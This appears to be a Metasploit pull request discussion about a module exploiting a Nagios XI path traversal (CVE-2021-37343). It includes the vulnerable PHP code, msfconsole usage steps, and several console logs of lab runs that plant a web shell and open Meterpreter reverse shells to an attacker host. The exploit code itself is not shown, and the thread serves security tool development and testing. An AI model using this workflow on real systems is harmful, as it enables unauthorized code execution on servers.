Nagios XI Web Shell Upload Module (CVE-2021-37343)

[jbaines-r7]

Description

This module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343). The path traversal allows a remote and authenticated administrator to upload a PHP web shell and execute code as www-data. The module achieves this by creating an autodiscovery job with an id field containing a path traversal to a writable and remotely accessible directory, and custom_ports field containing the web shell. A cron file will be created using the chosen path and file name, and the web shell is embedded in the cron file.

After the web shell has been written to the victim, this module will then use the web shell to establish a Meterpreter session or a reverse shell. By default, the web shell is deleted by the module, and the autodiscovery job is removed as well.

Additional Details

I tied the module into @ErikWynter 's Nagios XI scanner (great stuff, Erik!). I only needed to slide in identifying information and all worked well. Rubocop had a few things to say about rce_check.rb that made the diff slightly bigger but nothing crazy. msftidy does have two complaints still about rce_check.rb - I would have fixed them but they are absolutely meaningless to me, hopefully a reviewer can provide guidance:

albinolobster@ubuntu:~/metasploit-framework$ ./tools/dev/msftidy.rb lib/msf/core/exploit/remote/http/nagios_xi/rce_check.rb
lib/msf/core/exploit/remote/http/nagios_xi/rce_check.rb - [ERROR] Unable to determine super class
lib/msf/core/exploit/remote/http/nagios_xi/rce_check.rb - [ERROR] Missing "Description" info, please add

One thing I opted not to include in the module was the finish install logic that appears in a couple of other Nagios modules. The same logic appears in nagios_xi_scanner so it didn't seem right to copy and paste into my module as well.

The final oddity is that I left the affected versions to be 5.2.0 >= x < 5.8.5. Pre-5.2.0 is super old and I didn't feel like it was necessary to go spelunking back any further. Interestingly, the code at 5.2.0 is actually vulnerable to command injection (not just path traversal), I guess that probably received some sort of CVE along the way.

Here is the vulnerable bit at 5.2.0 (the issue is $tmpfile):

function autodiscovery_component_update_cron($id)
{
    $croncmd = autodiscovery_component_get_cron_cmdline($id);
    $crontimes = autodiscovery_component_get_cron_times($id);

    $cronline = sprintf("%s\t%s > /dev/null 2>&1\n", $crontimes, $croncmd);
    $tmpfile = get_tmp_dir() . "/scheduledreport." . $id;
    file_put_contents($tmpfile, $cronline);

    $cmd = "crontab -l | grep -v '" . escapeshellcmd($croncmd) . "' | cat - " . $tmpfile . " | crontab - ; rm -f " . $tmpfile;
    exec($cmd);
}

vs. 5.8.4:

function autodiscovery_component_update_cron($id)
{
    $croncmd = autodiscovery_component_get_cron_cmdline($id);
    $crontimes = autodiscovery_component_get_cron_times($id);

    $cronline = sprintf("%s\t%s > /dev/null 2>&1\n", $crontimes, $croncmd);
    $tmpfile = get_tmp_dir() . "/scheduledreport." . $id;
    file_put_contents($tmpfile, $cronline);

    $cmd = "crontab -l | grep -v " . escapeshellarg($croncmd) . " | cat - " . escapeshellarg($tmpfile) . " | crontab - ; rm -f " . escapeshellarg($tmpfile);
    exec($cmd);
}

Verification

Install Nagios XI 5.8.4 as described in the modules documentation.

• Start msfconsole
• use auxiliary/scanner/http/nagios_xi_scanner
• set RHOST <ip>
• set PASSWORD <password
• run
• Verify the host is flagged as vulnerable and exploit/linux/http/nagios_xi_autodiscovery_webshell is a suggested RCE module.
• use exploit/linux/http/nagios_xi_autodiscovery_webshell
• set RHOST <ip>
• set PASSWORD <password>
• check
• Verify the target is flagged as vulnerable
• set LHOST <ip>
• run
• You should get a Meterpreter session.

Video || GTFO

https://www.youtube.com/watch?v=ZhEvtjqFLVI

[jbaines-r7]

Retested after merging @space-r7 's recent suggestion/commit in drop_shell - all appears well.

msf6 > use exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
RHOST => 10.0.0.6
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > check

[*] Attempting to authenticate to Nagios XI...
[*] 10.0.0.6:443 - The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
LHOST => 10.0.0.3
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run

[*] Started reverse TCP handler on 10.0.0.3:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/
[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/VzXDacREcR.php
[*] Testing if web shell installation was successful
[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/VzXDacREcR.php
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Sending stage (989032 bytes) to 10.0.0.6
[+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/VzXDacREcR.php
[*] Command Stager progress - 100.00% done (700/700 bytes)
[*] Deleting autodiscovery job
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.6:39788 ) at 2022-02-09 12:39:21 -0800

meterpreter > shell
Process 258300 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),135(Debian-snmp),1001(nagios),1002(nagcmd)

[ErikWynter]

Thanks for the mention @jbaines-r7! This looks great! I'm happy to hear you were able to get some use out of my mixin and scanner. If you ever have some extra time, there are several additional RCE vectors that were found in recent years that could still be added, like these. I was planning to look into that at some point, but I never got around to it.

[space-r7]

Here's a test on version 5.8.4 on Ubuntu 20.04.1:

msf6 > use exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set rhost 192.168.140.251
rhost => 192.168.140.251
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set password password
password => password
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/
[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/zHoNHcG.php
[*] Testing if web shell installation was successful
[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/zHoNHcG.php
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Sending stage (989032 bytes) to 192.168.140.251
[+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/zHoNHcG.php
[*] Command Stager progress - 100.00% done (705/705 bytes)
[*] Deleting autodiscovery job
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.251:51722 ) at 2022-02-10 14:16:25 -0600

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 192.168.140.251
OS           : Ubuntu 20.04 (Linux 5.13.0-28-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

Regarding the msftidy output, msftidy is mostly intended for checking style, metadata, etc. for modules. I think if we're checking style for library code, running rubocop -a (or -A) <path> is preferred.

[jbaines-r7]

I added the ensure in `exploit as suggested and it had the desired affect. The job always gets cleaned up if created. Sample output:

msf6 > use exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
RHOST => 10.0.0.6
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
LHOST => 10.0.0.3
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run

[*] Started reverse TCP handler on 10.0.0.3:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/
[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/tQOcfcFJ.php
[*] Testing if web shell installation was successful
[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/tQOcfcFJ.php
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Sending stage (989032 bytes) to 10.0.0.6
[*] Command Stager progress - 100.00% done (700/700 bytes)
[*] Deleting autodiscovery job
[+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/tQOcfcFJ.php
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.6:39792 ) at 2022-02-10 17:29:26 -0800

meterpreter > quit
[*] Shutting down Meterpreter...

[*] 10.0.0.6 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set DEPTH 2
DEPTH => 2
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run

[*] Started reverse TCP handler on 10.0.0.3:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/
[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/QPEmnezLx.php
[*] Testing if web shell installation was successful
[*] Deleting autodiscovery job
[-] Exploit aborted due to failure: unexpected-reply: Unexpected HTTP status code 404
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > 

[space-r7]

Release Notes

This exploits a path traversal vulnerability in Nagios XI versions below 5.8.5 to achieve authenticated code execution as the www-data user.

[SharonBrizinov]

@jbaines-r7 cool module! but why not completing the chain with CVE-2021-37347 to get root? ;)